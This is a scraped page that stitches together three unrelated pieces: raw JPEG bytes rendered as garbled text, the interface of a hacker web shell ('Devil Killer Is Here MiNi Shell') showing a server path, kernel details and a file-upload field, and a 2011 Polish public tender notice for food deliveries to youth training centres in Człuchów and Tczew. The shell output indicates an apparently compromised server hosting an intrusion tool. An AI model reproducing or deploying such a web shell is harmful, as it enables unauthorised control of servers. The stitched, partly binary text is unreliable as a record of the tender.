JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111115/296829-N-2011.html

<p class="kh_header"><b>Gdańsk: Bezgotówkowa dostawa artykułów żywnościowych dla ROSZM  w Tczewie w 2012 r.</b><br>
<b>Numer ogłoszenia: 296829 - 2011; data zamieszczenia: 15.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy - Pomorska Wojewódzka Komenda , ul. J. Uphagena 27, 80-237 Gdańsk, woj. pomorskie, tel. 58 3017916, faks 58 3017916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pomorsohp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja rynku pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezgotówkowa dostawa artykułów żywnościowych dla ROSZM  w Tczewie w 2012 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest sukcesywna bezgotówkowa dostawa artykułów żywnościowych dla Rejonowego Ośrodka Szkolenia Zawodowego Młodzieży  od 1 stycznia 2012 r.  do dnia 31 grudnia 2012 roku do: 
- Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4- zadanie nr 1, 2, 3, 4, 5,6, 7, 8, 9, 10, 11, 12, 13, 14. 
- Ośrodka Szkolenia i Wychowania w Tczewie, ul. Sobieskiego 10 - zadanie nr 15, 16, 17, 18, 19, 20, 21, 22, 23 ,24, 25, 26, 27, 28.  

Przedmiot zamówienia podzielonego na dwadzieścia osiem  zadań częściowych:

Zadanie nr 1 - owoce świeże 
Zadanie nr 2 - owoce przetworzone  
Zadanie nr 3 - warzywa świeże 
Zadanie nr 4 - warzywa przetworzone 
Zadanie nr 5 - mrożonki 
Zadanie nr 6 - jaja
Zadanie nr 7 - mięso i produkty mięsne 
Zadanie nr 8 - ryby i przetwory konserwowe 
Zadanie nr 9 - produkty przemiału ziarna i skrobi - pieczywo 
Zadanie nr 10 - produkty skrobi - mąka  
Zadanie nr 11 - różne produkty spożywcze 
Zadanie nr 12- oleje i tłuszcze roślinne 
Zadanie nr 13 - produkty mleczarskie  
Zadanie nr 14 - napoje     
Zadanie nr 15 - owoce świeże 
Zadanie nr 16 - owoce przetworzone  
Zadanie nr 17 - warzywa świeże 
Zadanie nr 18 - warzywa przetworzone 
Zadanie nr 19- mrożonki 
Zadanie nr 20 - jaja
Zadanie nr 21 - mięso i produkty mięsne 
Zadanie nr 22 - ryby i przetwory konserwowe 
Zadanie nr 23 - produkty przemiału ziarna i skrobi - pieczywo 
Zadanie nr 24 - produkty skrobi - mąka  
Zadanie nr 25 - różne produkty spożywcze 
Zadanie nr 26- oleje i tłuszcze roślinne 
Zadanie nr 27 - produkty mleczarskie  
Zadanie nr 28 - napoje     


2) Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do: 
- Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4 (dokładne miejsce na terenie OSiW Człuchów wskazane będzie przez Zamawiającego po podpisaniu umowy) ZADANIE OD 1 DO 14. 
- Ośrodka Szkolenia i Wychowania w Tczewie , ul. Sobieskiego 10 (dokładne miejsce na terenie OSiW Tczew wskazane będzie przez Zamawiającego po podpisaniu umowy) ZADANIE OD 15 DO 28. 
3) Dostawca realizuje dostawy na własny koszt, transportem przystosowanym do tego celu i spełniającym niezbędne wymagania określone przepisami prawa obowiązującymi w tym zakresie. 
4) Każdy z artykułów powinien być dostarczony w wymaganych opakowaniach. Cykliczne dostawy  będą realizowane od poniedziałku do niedzieli w godzinach od  5.00 do   14.00. najpóźniej na drugi dzień od złożenia zapotrzebowania. Każdorazowa dostawa odbywa się na podstawie wcześniejszego zapotrzebowania określającego dokładną godzinę dostarczenia, datę dostarczenia, ilość, rodzaj artykułów, złożonego nawet w dniu poprzedzającym dostawę (pisemnie, faksem lub telefonicznie). 
Cykliczne dostawy  będą realizowane jak następuje:  
5) Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane artykuły z podaniem ilości.
6) Artykuły muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
7) Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa artykułów wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 
8) Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie artykułów do siedziby Zamawiającego na okres do następnej dostawy.
9) Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie.
Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia      zamówienia.
10) W trakcie realizacji zamówienia Zamawiający zastrzega sobie możliwość zamiany proporcji ilościowych poszczególnego asortymentu w stosunku do podanego w formularzu ofertowym. 
11) Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanych artykułów i      dostarczenia nowej partii artykułów do siedziby  Zamawiającego  w dniu złożenia reklamacji.
12) Do składania zamówień Zamawiający upoważni wybranego pracownika.
13) Każda dostawa winna być ubezpieczona przez Wykonawcę na jego koszt w zakresie odpowiedzialności cywilnej.
14)	W przypadku niedostarczenia towaru w wyznaczonym terminie i czasie lub dostarczenia towaru niezgodnie ze złożonym zapotrzebowaniem, Zamawiający zastrzega sobie prawo do zakupu niedostarczonego towaru, a kosztami zakupu (fakturą Vat) obciąży Wykonawcę. Zamawiający powiadomi o tym fakcie Wykonawcę telefonicznie i na piśmie.
15)	Jeżeli w opisie przedmiotu zamówienia znajduje się jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie rozwiązań równoważnych o parametrach techniczno eksploatacyjno użytkowych nie gorszych niż te, podane pod pojęciem typu. 
16)	Wykonawca ma obowiązek wystawiać każdorazowo faktury oddzielne na każde zadanie w ramach zamówienia cząstkowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.00-8, 15.30.00.00-1, 15.50.00.00-3, 15.43.00.00-1, 03.21.00.00-6, 15.40.00.00-5, 15.13.10.00-5, 15.33.11.70-9, 03.22.00.00-9, 15.86.00.00-0, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 28.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>19) Zamawiający dopuszcza zmianę postanowień zawartej umowy w zakresie:
a) Zmian organizacyjnych stron np. zmiana reprezentacji lub siedziby firmy. 
b) Zmian osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej  umowy. 
c) W przypadku zmian unormowań prawnych powszechnie obowiązujących np. zmiana urzędowej stawki podatku VAT. W przypadku zmiany obowiązującej stawki podatku VAT, Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT. Strony dokonają odpowiedniej zmiany wynagrodzenia w przypadku realizacji tej części zamówienia, której w dniu zmiany stawki podatku VAT jeszcze nie dokonano.
d) W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pomorskaohp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, ul. J. Uphagena 27, 80-237 Gdańsk
 6 piętro, pokój 610.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.11.2011 godzina 10:00, miejsce: w siedzibie Zamawiającego, ul. J. Uphagena 27, 80-237 Gdańsk
 (sekretariat) 6 piętro, pokój 605:.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		ananas owoc	szt	6
2		arbuz	kg	50
3		banany	kg	50
4		brzoskwinie	kg	26
5		cytryny	kg	10
6		czereśnie	kg	6
7		gruszki	kg	9
8		jabłka	kg	65
9		kiwi	kg	10
10	owoce	kiwi	szt	26
11		nektaryny	kg	26
12		maliny 500g	szt	3
13		maliny	kg	3
14		mandarynki	kg	32
15		pomarancza	kg	20
16		pomarańcza siatka	kg	10
17		rabarbar	kg	17
18		śliwki	kg	6
19		truskawki	kg	12
20		winogrona jasne	kg	15
21		winogrona ciemne	kg	15
22	świeże	wisnie	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowany450g	szt	20
brzoskwinie kons.0.9	szt	15
Dżem 7 kg	szt	2
Dżem  270 g	szt	65
dzem jednorazowy 25g	szt	120
kompot agrestowy 0,9l	szt	10
kompot wiśniowy 0,9 l	szt	9
marmolada owocowa 7kg	szt	1
owoce do ciasta 3 kg(puszka)	szt	1
sok owocowy 2l (różne smaki-pomarańcz grejfrut, jabłkowy, cz.pożeczka, mixitp)	szt	15
sok owocowy 1l (różne smaki-pomarań, gruszka, wiśnia, grejfrut,mix itp.)	szt	10
sok warzywno-owocowy (marchew-trusk-banan, Marchew-malina-banan, marchew-jabłko-banan itp.	szt	120
syrop owocowy 6,5l 	szt	7
syrop owocowy 1l 	szt	8
rodzynki suszone 100g	szt	10
rodzynki suszone 0.5 kg	szt	3
śliwki suszone 250g	szt	5
żurawina	szt	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> burak młody	kg	8
burak	kg	100
brokuł	szt	3
cebula	kg	150
cebula młoda	kg	30
cebula czerwona 	kg	3
czosnek	szt	5
czosnek	kg	1
fasola jaś 0,5kg	szt	7
fasola drobna 5kg	szt	1
fasola drobna 0,5 kg	szt	3
fasola jaś	kg	9
fasola szparagowa	kg	3
groch cały	kg	3
groch łuska	szt	8
groch łuskany 5kg	szt	2
jarmuz	kg	2
kabaczek	kg	13
kapusta czerwona	kg	8
kapusta młoda 	szt	80
kapusta 	kg	30
kapusta pekińska	kg	80
kapusta pekińska	szt	15
kapusta włoska	szt 	7
kalafior	szt	3
koper	szt	45
koper duży	szt	3
marchew młoda	kg	30
marchew myta	kg	140
ogórek gruntowy	kg	40
ogórek świeży	kg	50
papryka świeża	kg	30
pietruszka korzeń	kg	65
pomidor	kg	65
por 	szt	15
por 	kg	30
rzodkiewka pęczki	szt	80
sałata	szt	25
sałata dekoracyjna	szt	30
sałata lodowa	szt	13
seler	kg	63
seler naciowa	szt	13
szczypiorek	szt	27
szparagi	szt	6
zielenina natka	szt	130
ziemniaki młode	kg	120
ziemniaki 	kg	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chrzan tarty 160g	szt	12
chrzan z żurawiną	szt	5
cebulka konserwowa 300g	szt	8
fasolka czerwona konserw.	szt	10
groszek konserwowy 400g	szt	25
groszek z marchewką 0,9l	szt	8
kapusta kiszona  5kg	szt	8
koncentrat pomidorowy 0,9l	szt	13
koncentrat pomidorowy 1l	szt	7
kukurydza konserwowa	szt	20
kukurydza kons. 0,9 l	szt	8
oliwki 200ml	szt	10
oliwki ciemne	szt	10
ogórki kiszone 3kg	szt	5
ogórki małosolne	kg	25
ogórki konserwowe 0,9l	szt	30
papryka konserwowa 0,9l	szt	25
pieczarka	kg	24
pieczarka konserwowa 0,9l	szt	12
pieczarka solona 0.9	szt	10
pieczarka solona 3000ml	szt 	2
seler w słoiku 0,250	szt	8
surówka	kg	7
szczaw konserwowy 0,9l	szt	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.15.30.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brukselka mroż 0.5 kg	szt	3
brukselka mroż. 2,5 kg	szt	5
brokuły mroż. 2,5 kg	szt	5
frytki  1kg	szt	7
frytki 450g	szt	8
Frytki 1,5 kg	szt	5
Frytki 2 kg	szt	7
groszek mrozony	kg	5
groszek mrozony 2,5 kg	szt	2
hamburger mrozony 	szt	50
kalafior mroz 2,5 kg	szt	2
kalafior mroż	kg	10
marchew mini 2,5 kg	szt	7
marchew kostka 2,5 kg	szt	3
marchew kostka mroż	kg	8
marchew z groszkiem 2,5 kg	szt	3
marchew z groszkiem mroż	kg	8
mieszanka kompotowa 	kg	7
pizza 500g	szt	50
pyzy z mięsem  	kg	30
pyzy z owocami (knedle)	kg	30
Pierożki ravioli 0,5kg	szt	7
Pierożki Ravioli 1 kg	szt	3
szpinak 1kg	szt	10
truskawki mrozone	kg	5
warzywa na patelnię	kg	7
warzywa na pat.chinskie	kg	3
zapiekanka 200g	szt	100
zupa wiosenna	kg	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja klasy M o grmaturze 53-63 gr	szt	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 93.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 - mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> boczek świeży	kg	8
boczek wędzony gotowany 	kg	5
boczek wędzony surowy	kg	5
baleron wieprzowy	kg	20
ćwiartki tylne drobiowe	kg	27
filet drobiowy	kg	8
filet z piersi kurczaka	kg	40
filet królewski z indyka	kg	13
kflaki wieprzowe	kg	7
flaki wołowe	kg	15
flaki wołowe 1 kg	szt	15
golonka wieprz b/k	kg	20
golonka wiep z kością	kg	7
kabanosy leśne  lub równoważne	kg	10
karkówka wieprz b/k 	kg	60
karkówka wieprz z/k	kg	20
kiełbasa biała parzona	kg	50
kiełbasa biała  surowa	kg	50
kiełbasa codzienna  lub równoważna	kg	18
kiełbasa śląska  lub równoważna	kg	20
kiełbasa toruńska  lub równoważna	kg	53
kiełbasa typu mysliwska  lub równoważna	kg	13
kiełbasa typu ogniskowa  lub równoważna	kg	30
kiełbasa szynkowa	kg	85
kiełbasa z weka  lub równoważna	kg	12
kiełbasa typu krakowska  lub równoważna	kg	11
kiełbasa typu krakowska parzona  lub równoważne	kg	12
kiełbasa typu zywiecka lub równoważna	kg	12
korpusy drobiowe(grzbiety)	kg	73
kości wieprzowe	kg	67
kotlet do hamburgera	kg	8
kotlet do hamburgera 250g	szt	30
kurczak świe.	kg	33
królewiecka  lub równoważna	kg	30
łopatka b/k	kg	67
łopatka z kością	kg	8
metka cebulowa 200g	szt	40
metka łososiowa 	kg	7
metka inna typu wiejska  lub równoważna	kg	8
mielonka konserwowa	kg	7
mielonka śniadaniowa  lub równoważne	kg	11
mięso gulaszowe	kg	10
mortadela	kg	3
ogonówka 	kg	40
ozory wieprzowe	kg	10
parówka hot-dog drobiowa	kg	5
parówka w folii	kg	33
parówka wiedenska  lub równoważna	kg	20
pasztetowa  domowa	kg	7
pasztetowa  śmietankowa  lub równoważne	kg	7
pasztet drobiowy	kg	8
polędwica drobiowa	kg	13
polędwica miodowa  lub równoważne	kg	10
polędwica sopocka drobiowa  lub równoważne	kg	13
polędwica szkolna  lub równoważna	kg	7
polędwica wieprzowa (Mięso)	kg	5
polędwica wieprz.(wędlina)	kg	7
polędwica z warzywami	kg	7
przysmak w konserwie	kg	8
przysmak śniadaniowy 130g	szt	13
rozbeft wołowy	kg	5
salami rodzinne	kg	8
salceson biały typu włoski  lub równoważny	kg	2
salceson czarny ozorkowy	kg	2
serca drobiowe	kg	3
serdelki	kg	22
schab wiep b/k	kg	27
schab wiep z/k	kg	5
skrzydełka z kurczaka	kg	17
słonina	kg	2
smaczek konserwowy	kg	17
smaczek konserwowy 0,5kg	szt	4
szynka mielona	kg	4
szynka konserwowa 	kg	8
szynka wiep b/k	kg	30
szynka typu królewiecka mielo  lub równoważna	kg	4
szynka typu szynka żołniers  lub równoważna	kg	17
tyrolska  lub równoważna	kg	15
tyrolska puszka 300g  lub równoważna	szt	13
turystyczna  lub równoważna	szt	15
udka	kg	200
wątroba drobiowa	kg	7
wątroba wieprzowa	kg	7
